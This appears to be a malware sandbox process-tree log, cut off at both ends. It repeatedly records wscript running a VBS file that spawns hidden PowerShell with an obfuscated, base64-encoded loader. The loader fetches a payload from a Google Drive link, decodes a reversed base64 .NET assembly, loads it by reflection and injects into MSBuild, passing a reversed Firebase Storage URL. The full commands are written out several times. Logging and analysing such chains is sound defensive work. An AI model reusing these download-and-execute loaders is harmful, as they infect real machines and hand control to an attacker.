ZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRWM1ZBSTRWMyk7cnRrdmFpTWV0aG9kLkludm9rZShydGtudWxsLCAnKydAKDRWMzcyNWVhY2JkNTFmMScrJy0wNjliLTA2NTQtYTlhNC1hM2Y4MjFjMD1uZWtvdCZhaWRlbT10bGE/dHh0LlRJVFNFVC9vL21vYy50b3BzcHBhLmIxMGFlLW9pbS1vdGNlJysneW9ycC9iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdHRoNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VicrJzNkZXNhdCcrJ2l2YWRvNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VjNNU0J1aWxkNFYzJysnLCA0VjNkZXNhdGl2YWQnKydvNFYzLDRWM2Rlc2F0aXZhZG80VjMsNFYnKyczZGVzYXRpdmFkJysnbzRWMyw0VicrJzNVUkw0VjMsIDRWM0M6Ym0nKydXUHJvZ3JhbURhdGFiJysnbVc0VjMsNFYzY2Fydm9lamFyNFYzLDRWM3ZiczRWMyw0JysnVjMxNFYzLDRWMzE0VjMpKTsnKS1jUmVwTEFjRSAgJ3J0aycsW0NIYXJdMzYgIC1SZVBMQUNFKFtDSGFyXTgyK1tDSGFyXTY2K1tDSGFyXTg2KSxbQ0hhcl0xMjQgLVJlUExBQ0UgKFtDSGFyXTUyK1tDSGFyXTg2K1tDSGFyXTUxKSxbQ0hhcl0zOS1jUmVwTEFjRSAgKFtDSGFyXTk4K1tDSGFyXTEwOStbQ0hhcl04NyksW0NIYXJdOTIpIHwgJiAoIChbc1RSSW5HXSR2ZXJCT1NFUFJFRmVyRW5jZSlbMSwzXSsneCctam9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5888
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('rtkimageUrl = 4V3https://drive.google.com/u'+'c?export=download&id=1AIV'+'gJJ'+'Jv1F6vS4sU'+'OybnH-sDvUhBYwur4V3;rtkwebClient = New-'+'Object S'+'ystem.Net.WebClient;rtkimageBytes = rtkwebClient.Do'+'wnloadDat'+'a(rtkimageUrl);rtkimageText = [Sys'+'tem.Text.Encoding]::UTF8.GetString(rtkimageBytes);rtkstar'+'tFlag = 4V3<<'+'BASE64_START>>4V3;rtkendFlag = 4V3<<BASE64_END>>4V3;rtkstartI'+'ndex = rtk'+'imageText.IndexOf(rtkstartFlag);rtkendIndex = rtkimageText.IndexOf(rtke'+'ndFlag);rtksta'+'rtInd'+'ex -ge 0 -and rtkendIndex -gt rtkstartIndex;rtks'+'tartIndex += rtkstartFla'+'g.Length;rtkbase64Length = rtkendIndex - rtkstartIndex;rtkbase64Command = rtkimageText.Substring('+'rtkstartIndex, rtkbase64Length'+');rtkbas'+'e64Reversed = -join (rtk'+'base64Command.ToCharArray() RBV '+'F'+'orEach-Object { rtk_ })[-1..-(rtkbase64Command.Length)];rtkcommandBytes = [System.Convert]::FromBase64String(r'+'tkbase64Reversed);rtkloade'+'dAssembly = [System.Reflection.A'+'ssembly]::Lo'+'ad(rtkcommandBytes);rtkvaiMethod = [dnlib.IO.Home].GetMethod(4V3VAI4V3);rtkvaiMethod.Invoke(rtknull, '+'@(4V3725eacbd51f1'+'-069b-0654-a9a4-a3f821c0=nekot&aidem=tla?txt.TITSET/o/moc.topsppa.b10ae-oim-otce'+'yorp/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth4V3, 4V3desativado4V3, 4V'+'3desat'+'ivado4V3, 4V3desativado4V3, 4V3MSBuild4V3'+', 4V3desativad'+'o4V3,4V3desativado4V3,4V'+'3desativad'+'o4V3,4V'+'3URL4V3, 4V3C:bm'+'WProgramDatab'+'mW4V3,4V3carvoejar4V3,4V3vbs4V3,4'+'V314V3,4V314V3));')-cRepLAcE 'rtk',[CHar]36 -RePLACE([CHar]82+[CHar]66+[CHar]86),[CHar]124 -RePLACE ([CHar]52+[CHar]86+[CHar]51),[CHar]39-cRepLAcE ([CHar]98+[CHar]109+[CHar]87),[CHar]92) | & ( ([sTRInG]$verBOSEPREFerEnce)[1,3]+'x'-joiN'')"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    PID:1112
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:4852
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4564

C:\Windows\system32\wscript.exe
wscript.exe C:\ProgramData\carvoejar.vbs
1⤵
- Checks computer location settings
PID:5336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgncnRraW1hZ2VVcmwgPSA0VjNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdScrJ2M/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVYnKydnSkonKydKdjFGNnZTNHNVJysnT3libkgtc0R2VWhCWXd1cjRWMztydGt3ZWJDbGllbnQgPSBOZXctJysnT2JqZWN0IFMnKyd5c3RlbS5OZXQuV2ViQ2xpZW50O3J0a2ltYWdlQnl0ZXMgPSBydGt3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXQnKydhKHJ0a2ltYWdlVXJsKTtydGtpbWFnZVRleHQgPSBbU3lzJysndGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhydGtpbWFnZUJ5dGVzKTtydGtzdGFyJysndEZsYWcgPSA0VjM8PCcrJ0JBU0U2NF9TVEFSVD4+NFYzO3J0a2VuZEZsYWcgPSA0VjM8PEJBU0U2NF9FTkQ+PjRWMztydGtzdGFydEknKyduZGV4ID0gcnRrJysnaW1hZ2VUZXh0LkluZGV4T2YocnRrc3RhcnRGbGFnKTtydGtlbmRJbmRleCA9IHJ0a2ltYWdlVGV4dC5JbmRleE9mKHJ0a2UnKyduZEZsYWcpO3J0a3N0YScrJ3J0SW5kJysnZXggLWdlIDAgLWFuZCBydGtlbmRJbmRleCAtZ3QgcnRrc3RhcnRJbmRleDtydGtzJysndGFydEluZGV4ICs9IHJ0a3N0YXJ0RmxhJysnZy5MZW5ndGg7cnRrYmFzZTY0TGVuZ3RoID0gcnRrZW5kSW5kZXggLSBydGtzdGFydEluZGV4O3J0a2Jhc2U2NENvbW1hbmQgPSBydGtpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ3J0a3N0YXJ0SW5kZXgsIHJ0a2Jhc2U2NExlbmd0aCcrJyk7cnRrYmFzJysnZTY0UmV2ZXJzZWQgPSAtam9pbiAocnRrJysnYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJCViAnKydGJysnb3JFYWNoLU9iamVjdCB7IHJ0a18gfSlbLTEuLi0ocnRrYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtydGtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHInKyd0a2Jhc2U2NFJldmVyc2VkKTtydGtsb2FkZScrJ2RBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5BJysnc3NlbWJseV06OkxvJysnYWQocnRrY29tbWFuZEJ5dGVzKTtydGt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRWM1ZBSTRWMyk7cnRrdmFpTWV0aG9kLkludm9rZShydGtudWxsLCAnKydAKDRWMzcyNWVhY2JkNTFmMScrJy0wNjliLTA2NTQtYTlhNC1hM2Y4MjFjMD1uZWtvdCZhaWRlbT10bGE/dHh0LlRJVFNFVC9vL21vYy50b3BzcHBhLmIxMGFlLW9pbS1vdGNlJysneW9ycC9iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdHRoNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VicrJzNkZXNhdCcrJ2l2YWRvNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VjNNU0J1aWxkNFYzJysnLCA0VjNkZXNhdGl2YWQnKydvNFYzLDRWM2Rlc2F0aXZhZG80VjMsNFYnKyczZGVzYXRpdmFkJysnbzRWMyw0VicrJzNVUkw0VjMsIDRWM0M6Ym0nKydXUHJvZ3JhbURhdGFiJysnbVc0VjMsNFYzY2Fydm9lamFyNFYzLDRWM3ZiczRWMyw0JysnVjMxNFYzLDRWMzE0VjMpKTsnKS1jUmVwTEFjRSAgJ3J0aycsW0NIYXJdMzYgIC1SZVBMQUNFKFtDSGFyXTgyK1tDSGFyXTY2K1tDSGFyXTg2KSxbQ0hhcl0xMjQgLVJlUExBQ0UgKFtDSGFyXTUyK1tDSGFyXTg2K1tDSGFyXTUxKSxbQ0hhcl0zOS1jUmVwTEFjRSAgKFtDSGFyXTk4K1tDSGFyXTEwOStbQ0hhcl04NyksW0NIYXJdOTIpIHwgJiAoIChbc1RSSW5HXSR2ZXJCT1NFUFJFRmVyRW5jZSlbMSwzXSsneCctam9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5188
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('rtkimageUrl = 4V3https://drive.google.com/u'+'c?export=download&id=1AIV'+'gJJ'+'Jv1F6vS4sU'+'OybnH-sDvUhBYwur4V3;rtkwebClient = New-'+'Object S'+'ystem.Net.WebClient;rtkimageBytes = rtkwebClient.Do'+'wnloadDat'+'a(rtkimageUrl);rtkimageText = [Sys'+'tem.Text.Encoding]::UTF8.GetString(rtkimageBytes);rtkstar'+'tFlag = 4V3<<'+'BASE64_START>>4V3;rtkendFlag = 4V3<<BASE64_END>>4V3;rtkstartI'+'ndex = rtk'+'imageText.IndexOf(rtkstartFlag);rtkendIndex = rtkimageText.IndexOf(rtke'+'ndFlag);rtksta'+'rtInd'+'ex -ge 0 -and rtkendIndex -gt rtkstartIndex;rtks'+'tartIndex += rtkstartFla'+'g.Length;rtkbase64Length = rtkendIndex - rtkstartIndex;rtkbase64Command = rtkimageText.Substring('+'rtkstartIndex, rtkbase64Length'+');rtkbas'+'e64Reversed = -join (rtk'+'base64Command.ToCharArray() RBV '+'F'+'orEach-Object { rtk_ })[-1..-(rtkbase64Command.Length)];rtkcommandBytes = [System.Convert]::FromBase64String(r'+'tkbase64Reversed);rtkloade'+'dAssembly = [System.Reflection.A'+'ssembly]::Lo'+'ad(rtkcommandBytes);rtkvaiMethod = [dnlib.IO.Home].GetMethod(4V3VAI4V3);rtkvaiMethod.Invoke(rtknull, '+'@(4V3725eacbd51f1'+'-069b-0654-a9a4-a3f821c0=nekot&aidem=tla?txt.TITSET/o/moc.topsppa.b10ae-oim-otce'+'yorp/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth4V3, 4V3desativado4V3, 4V'+'3desat'+'ivado4V3, 4V3desativado4V3, 4V3MSBuild4V3'+', 4V3desativad'+'o4V3,4V3desativado4V3,4V'+'3desativad'+'o4V3,4V'+'3URL4V3, 4V3C:bm'+'WProgramDatab'+'mW4V3,4V3carvoejar4V3,4V3vbs4V3,4'+'V314V3,4V314V3));')-cRepLAcE 'rtk',[CHar]36 -RePLACE([CHar]82+[CHar]66+[CHar]86),[CHar]124 -RePLACE ([CHar]52+[CHar]86+[CHar]51),[CHar]39-cRepLAcE ([CHar]98+[CHar]109+[CHar]87),[CHar]92) | & ( ([sTRInG]$verBOSEPREFerEnce)[1,3]+'x'-joiN'')"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    PID:5808
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1724

C:\Windows\system32\wscript.exe
wscript.exe C:\ProgramData\carvoejar.vbs
1⤵
- Checks computer location settings
PID:5460
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgncnRraW1hZ2VVcmwgPSA0VjNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdScrJ2M/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVYnKydnSkonKydKdjFGNnZTNHNVJysnT3libkgtc0R2VWhCWXd1cjRWMztydGt3ZWJDbGllbnQgPSBOZXctJysnT2JqZWN0IFMnKyd5c3RlbS5OZXQuV2ViQ2xpZW50O3J0a2ltYWdlQnl0ZXMgPSBydGt3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXQnKydhKHJ0a2ltYWdlVXJsKTtydGtpbWFnZVRleHQgPSBbU3lzJysndGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhydGtpbWFnZUJ5dGVzKTtydGtzdGFyJysndEZsYWcgPSA0VjM8PCcrJ0JBU0U2NF9TVEFSVD4+NFYzO3J0a2VuZEZsYWcgPSA0VjM8PEJBU0U2NF9FTkQ+PjRWMztydGtzdGFydEknKyduZGV4ID0gcnRrJysnaW1hZ2VUZXh0LkluZGV4T2YocnRrc3RhcnRGbGFnKTtydGtlbmRJbmRleCA9IHJ0a2ltYWdlVGV4dC5JbmRleE9mKHJ0a2UnKyduZEZsYWcpO3J0a3N0YScrJ3J0SW5kJysnZXggLWdlIDAgLWFuZCBydGtlbmRJbmRleCAtZ3QgcnRrc3RhcnRJbmRleDtydGtzJysndGFydEluZGV4ICs9IHJ0a3N0YXJ0RmxhJysnZy5MZW5ndGg7cnRrYmFzZTY0TGVuZ3RoID0gcnRrZW5kSW5kZXggLSBydGtzdGFydEluZGV4O3J0a2Jhc2U2NENvbW1hbmQgPSBydGtpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ3J0a3N0YXJ0SW5kZXgsIHJ0a2Jhc2U2NExlbmd0aCcrJyk7cnRrYmFzJysnZTY0UmV2ZXJzZWQgPSAtam9pbiAocnRrJysnYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJCViAnKydGJysnb3JFYWNoLU9iamVjdCB7IHJ0a18gfSlbLTEuLi0ocnRrYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtydGtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHInKyd0a2Jhc2U2NFJldmVyc2VkKTtydGtsb2FkZScrJ2RBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5BJysnc3NlbWJseV06OkxvJysnYWQocnRrY29tbWFuZEJ5dGVzKTtydGt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRWM1ZBSTRWMyk7cnRrdmFpTWV0aG9kLkludm9rZShydGtudWxsLCAnKydAKDRWMzcyNWVhY2JkNTFmMScrJy0wNjliLTA2NTQtYTlhNC1hM2Y4MjFjMD1uZWtvdCZhaWRlbT10bGE/dHh0LlRJVFNFVC9vL21vYy50b3BzcHBhLmIxMGFlLW9pbS1vdGNlJysneW9ycC9iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdHRoNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VicrJzNkZXNhdCcrJ2l2YWRvNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VjNNU0J1aWxkNFYzJysnLCA0VjNkZXNhdGl2YWQnKydvNFYzLDRWM2Rlc2F0aXZhZG80VjMsNFYnKyczZGVzYXRpdmFkJysnbzRWMyw0VicrJzNVUkw0VjMsIDRWM0M6Ym0nKydXUHJvZ3JhbURhdGFiJysnbVc0VjMsNFYzY2Fydm9lamFyNFYzLDRWM3ZiczRWMyw0JysnVjMxNFYzLDRWMzE0VjMpKTsnKS1jUmVwTEFjRSAgJ3J0aycsW0NIYXJdMzYgIC1SZVBMQUNFKFtDSGFyXTgyK1tDSGFyXTY2K1tDSGFyXTg2KSxbQ0hhcl0xMjQgLVJlUExBQ0UgKFtDSGFyXTUyK1tDSGFyXTg2K1tDSGFyXTUxKSxbQ0hhcl0zOS1jUmVwTEFjRSAgKFtDSGFyXTk4K1tDSGFyXTEwOStbQ0hhcl04NyksW0NIYXJdOTIpIHwgJiAoIChbc1RSSW5HXSR2ZXJCT1NFUFJFRmVyRW5jZSlbMSwzXSsneCctam9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5600
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('rtkimageUrl = 4V3https://drive.google.com/u'+'c?export=download&id=1AIV'+'gJJ'+'Jv1F6vS4sU'+'OybnH-sDvUhBYwur4V3;rtkwebClient = New-'+'Object S'+'ystem.Net.WebClient;rtkimageBytes = rtkwebClient.Do'+'wnloadDat'+'a(rtkimageUrl);rtkimageText = [Sys'+'tem.Text.Encoding]::UTF8.GetString(rtkimageBytes);rtkstar'+'tFlag = 4V3<<'+'BASE64_START>>4V3;rtkendFlag = 4V3<<BASE64_END>>4V3;rtkstartI'+'ndex = rtk'+'imageText.IndexOf(rtkstartFlag);rtkendIndex = rtkimageText.IndexOf(rtke'+'ndFlag);rtksta'+'rtInd'+'ex -ge 0 -and rtkendIndex -gt rtkstartIndex;rtks'+'tartIndex += rtkstartFla'+'g.Length;rtkbase64Length = rtkendIndex - rtkstartIndex;rtkbase64Command = rtkimageText.Substring('+'rtkstartIndex, rtkbase64Length'+');rtkbas'+'e64Reversed = -join (rtk'+'base64Command.ToCharArray() RBV '+'F'+'orEach-Object { rtk_ })[-1..-(rtkbase64Command.Length)];rtkcommandBytes = [System.Convert]::FromBase64String(r'+'tkbase64Reversed);rtkloade'+'dAssembly = [System.Reflection.A'+'ssembly]::Lo'+'ad(rtkcommandBytes);rtkvaiMethod = [dnlib.IO.Home].GetMethod(4V3VAI4V3);rtkvaiMethod.Invoke(rtknull, '+'@(4V3725eacbd51f1'+'-069b-0654-a9a4-a3f821c0=nekot&aidem=tla?txt.TITSET/o/moc.topsppa.b10ae-oim-otce'+'yorp/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth4V3, 4V3desativado4V3, 4V'+'3desat'+'ivado4V3, 4V3desativado4V3, 4V3MSBuild4V3'+', 4V3desativad'+'o4V3,4V3desativado4V3,4V'+'3desativad'+'o4V3,4V'+'3URL4V3, 4V3C:bm'+'WProgramDatab'+'mW4V3,4V3carvoejar4V3,4V3vbs4V3,4'+'V314V3,4V314V3));')-cRepLAcE 'rtk',[CHar]36 -RePLACE([CHar]82+[CHar]66+[CHar]86),[CHar]124 -RePLACE ([CHar]52+[CHar]86+[CHar]51),[CHar]39-cRepLAcE ([CHar]98+[CHar]109+[CHar]87),[CHar]92) | & ( ([sTRInG]$verBOSEPREFerEnce)[1,3]+'x'-joiN'')"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    PID:5648
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1012

C:\Windows\system32\wscript.exe
wscript.exe C:\ProgramData\carvoejar.vbs
1⤵
- Checks computer location settings
PID:5148
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgncnRraW1hZ2VVcmwgPSA0VjNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdScrJ2M/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVYnKydnSkonKydKdjFGNnZTNHNVJysnT3libkgtc0R2VWhCWXd1cjRWMztydGt3ZWJDbGllbnQgPSBOZXctJysnT2JqZWN0IFMnKyd5c3RlbS5OZXQuV2ViQ2xpZW50O3J0a2ltYWdlQnl0ZXMgPSBydGt3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXQnKydhKHJ0a2ltYWdlVXJsKTtydGtpbWFnZVRleHQgPSBbU3lzJysndGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhydGtpbWFnZUJ5dGVzKTtydGtzdGFyJysndEZsYWcgPSA0VjM8PCcrJ0JBU0U2NF9TVEFSVD4+NFYzO3J0a2VuZEZsYWcgPSA0VjM8PEJBU0U2NF9FTkQ+PjRWMztydGtzdGFydEknKyduZGV4ID0gcnRrJysnaW1hZ2VUZXh0LkluZGV4T2YocnRrc3RhcnRGbGFnKTtydGtlbmRJbmRleCA9IHJ0a2ltYWdlVGV4dC5JbmRleE9mKHJ0a2UnKyduZEZsYWcpO3J0a3N0YScrJ3J0SW5kJysnZXggLWdlIDAgLWFuZCBydGtlbmRJbmRleCAtZ3QgcnRrc3RhcnRJbmRleDtydGtzJysndGFydEluZGV4ICs9IHJ0a3N0YXJ0RmxhJysnZy5MZW5ndGg7cnRrYmFzZTY0TGVuZ3RoID0gcnRrZW5kSW5kZXggLSBydGtzdGFydEluZGV4O3J0a2Jhc2U2NENvbW1hbmQgPSBydGtpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ3J0a3N0YXJ0SW5kZXgsIHJ0a2Jhc2U2NExlbmd0aCcrJyk7cnRrYmFzJysnZTY0UmV2ZXJzZWQgPSAtam9pbiAocnRrJysnYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJCViAnKydGJysnb3JFYWNoLU9iamVjdCB7IHJ0a18gfSlbLTEuLi0ocnRrYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtydGtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHInKyd0a2Jhc2U2NFJldmVyc2VkKTtydGtsb2FkZScrJ2RBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5BJysnc3NlbWJseV06OkxvJysnYWQocnRrY29tbWFuZEJ5dGVzKTtydGt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRWM1ZBSTRWMyk7cnRrdmFpTWV0aG9kLkludm9rZShydGtudWxsLCAnKydAKDRWMzcyNWVhY2JkNTFmMScrJy0wNjliLTA2NTQtYTlhNC1hM2Y4MjFjMD1uZWtvdCZhaWRlbT10bGE/dHh0LlRJVFNFVC9vL21vYy50b3BzcHBhLmIxMGFlLW9pbS1vdGNlJysneW9ycC9iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdHRoNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VicrJzNkZXNhdCcrJ2l2YWRvNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VjNNU0J1aWxkNFYzJysnLCA0VjNkZXNhdGl2YWQnKydvNFYzLDRWM2Rlc2F0aXZhZG80VjMsNFYnKyczZGVzYXRpdmFkJysnbzRWMyw0VicrJzNVUkw0VjMsIDRWM0M6Ym0nKydXUHJvZ3JhbURhdGFiJysnbVc0VjMsNFYzY2Fydm9lamFyNFYzLDRWM3ZiczRWMyw0JysnVjMxNFYzLDRWMzE0VjMpKTsnKS1jUmVwTEFjRSAgJ3J0aycsW0NIYXJdMzYgIC1SZVBMQUNFKFtDSGFyXTgyK1tDSGFyXTY2K1tDSGFyXTg2KSxbQ0hhcl0xMjQgLVJlUExBQ0UgKFtDSGFyXTUyK1tDSGFyXTg2K1tDSGFyXTUxKSxbQ0hhcl0zOS1jUmVwTEFjRSAgKFtDSGFyXTk4K1tDSGFyXTEwOStbQ0hhcl04NyksW0NIYXJdOTIpIHwgJiAoIChbc1RSSW5HXSR2ZXJCT1NFUFJFRmVyRW5jZSlbMSwzXSsneCctam9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5396
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('rtkimageUrl = 4V3https://drive.google.com/u'+'c?export=download&id=1AIV'+'gJJ'+'Jv1F6vS4sU'+'OybnH-sDvUhBYwur4V3;rtkwebClient = New-'+'Object S'+'ystem.Net.WebClient;rtkimageBytes = rtkwebClient.Do'+'wnloadDat'+'a(rtkimageUrl);rtkimageText = [Sys'+'tem.Text.Encoding]::UTF8.GetString(rtkimageBytes);rtkstar'+'tFlag = 4V3<<'+'BASE64_START>>4V3;rtkendFlag = 4V3<<BASE64_END>>4V3;rtkstartI'+'ndex = rtk'+'imageText.IndexOf(rtkstartFlag);rtkendIndex = rtkimageText.IndexOf(rtke'+'ndFlag);rtksta'+'rtInd'+'ex -ge 0 -and rtkendIndex -gt rtkstartIndex;rtks'+'tartIndex += rtkstartFla'+'g.Length;rtkbase64Length = rtkendIndex - rtkstartIndex;rtkbase64Command = rtkimageText.Substring('+'rtkstartIndex, rtkbase64Length'+');rtkbas'+'e64Reversed = -join (rtk'+'base64Command.ToCharArray() RBV '+'F'+'orEach-Object { rtk_ })[-1..-(rtkbase64Command.Length)];rtkcommandBytes = [System.Convert]::FromBase64String(r'+'tkbase64Reversed);rtkloade'+'dAssembly = [System.Reflection.A'+'ssembly]::Lo'+'ad(rtkcommandBytes);rtkvaiMethod = [dnlib.IO.Home].GetMethod(4V3VAI4V3);rtkvaiMethod.Invoke(rtknull, '+'@(4V3725eacbd51f1'+'-069b-0654-a9a4-a3f821c0=nekot&aidem=tla?txt.TITSET/o/moc.topsppa.b10ae-oim-otce'+'yorp/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth4V3, 4V3desativado4V3, 4V'+'3desat'+'ivado4V3, 4V3desativado4V3, 4V3MSBuild4V3'+', 4V3desativad'+'o4V3,4V3desativado4V3,4V'+'3desativad'+'o4V3,4V'+'3URL4V3, 4V3C:bm'+'WProgramDatab'+'mW4V3,4V3carvoejar4V3,4V3vbs4V3,4'+'V314V3,4V314V3));')-cRepLAcE 'rtk',[CHar]36 -RePLACE([CHar]82+[CHar]66+[CHar]86),[CHar]124 -RePLACE ([CHar]52+[CHar]86+[CHar]51),[CHar]39-cRepLAcE ([CHar]98+[CHar]109+[CHar]87),[CHar]92) | & ( ([sTRInG]$verBOSEPREFerEnce)[1,3]+'x'-joiN'')"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    PID:2312
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3112

C:\Windows\system32\wscript.exe
wscript.exe C:\ProgramData\carvoejar.vbs
1⤵
- Checks computer location settings
PID:180
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgncnRraW1hZ2VVcmwgPSA0VjNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdScrJ2M/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVYnKydnSkonKydKdjFGNnZTNHNVJysnT3libkgtc0R2VWhCWXd1cjRWMztydGt3ZWJDbGllbnQgPSBOZXctJysnT2JqZWN0IFMnKyd5c3RlbS5OZXQuV2ViQ2xpZW50O3J0a2ltYWdlQnl0ZXMgPSBydGt3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXQnKydhKHJ0a2ltYWdlVXJsKTtydGtpbWFnZVRleHQgPSBbU3lzJysndGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhydGtpbWFnZUJ5dGVzKTtydGtzdGFyJysndEZsYWcgPSA0VjM8PCcrJ0JBU0U2NF9TVEFSVD4+NFYzO3J0a2VuZEZsYWcgPSA0VjM8PEJBU0U2NF9FTkQ+PjRWMztydGtzdGFydEknKyduZGV4ID0gcnRrJysnaW1hZ2VUZXh0LkluZGV4T2YocnRrc3RhcnRGbGFnKTtydGtlbmRJbmRleCA9IHJ0a2ltYWdlVGV4dC5JbmRleE9mKHJ0a2UnKyduZEZsYWcpO3J0a3N0YScrJ3J0SW5kJysnZXggLWdlIDAgLWFuZCBydGtlbmRJbmRleCAtZ3QgcnRrc3RhcnRJbmRleDtydGtzJysndGFydEluZGV4ICs9IHJ0a3N0YXJ0RmxhJysnZy5MZW5ndGg7cnRrYmFzZTY0TGVuZ3RoID0gcnRrZW5k